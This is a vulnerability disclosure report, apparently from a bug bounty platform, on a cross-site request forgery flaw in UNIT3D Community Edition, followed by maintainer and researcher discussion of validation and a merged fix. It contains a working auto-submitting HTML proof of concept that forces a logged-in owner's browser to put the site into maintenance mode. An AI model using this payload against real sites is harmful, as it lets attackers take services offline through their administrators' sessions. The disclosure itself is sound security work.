Cross-Site Request Forgery (CSRF) in hdinnovations/unit3d-community-edition

Valid

Reported on

Sep 23rd 2021


Description

Attacker is able to disable the form

Proof of Concept

When you logged in open this POC.html in a browser. You can put the website into maintenance mode.

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://unit3d.site/dashboard/commands/maintance-enable">
    <input type="submit" value="Submit request" />
</form>
<script>
  document.forms[0].submit();
</script>
</body>
</html>

Impact

This vulnerability is capable of disabling the website.

Occurences

We have contacted a member of the hdinnovations/unit3d-community-edition team and are waiting to hear back a month ago
We have contacted a member of the hdinnovations/unit3d-community-edition team and are waiting to hear back a month ago
hexdubbers modified their report
a month ago
HDVinnie
a month ago

@hexdubbers this route is protected. While the POC works it only works if you are logged in as a user in the owner group. Hence why it works on the demo site using the demo owner login credentials. https://github.com/HDInnovations/UNIT3D-Community-Edition/blob/9d49c536d00a259740b814a5b37af02ceff6c617/app/Http/Controllers/Staff/CommandController.php#L42

However I do still agree it should be a POST request with CRSF token and not a GET.

Im just not sure this Disclosure is proper as is.

HDVinnie validated this vulnerability a month ago
hexdubbers has been awarded the disclosure bounty
The fix bounty is now up for grabs
HDVinnie confirmed that a fix has been merged on bde1c7 a month ago
HDVinnie has been awarded the fix bounty
web.php#L736 has been validated
hexdubbers
a month ago

Researcher


@HDVinnie hey thanks for the bounty! I read your comment and I'm curious on what the difference between this report and this "https://huntr.dev/bounties/2a6fc0f8-44c0-4ecd-85f7-188e21e5f42d/" one is that you reported. If an attacker sent an admin my POC and clicked on it then the forum would be disabled. Please let me known if I am wrong since that is my understanding.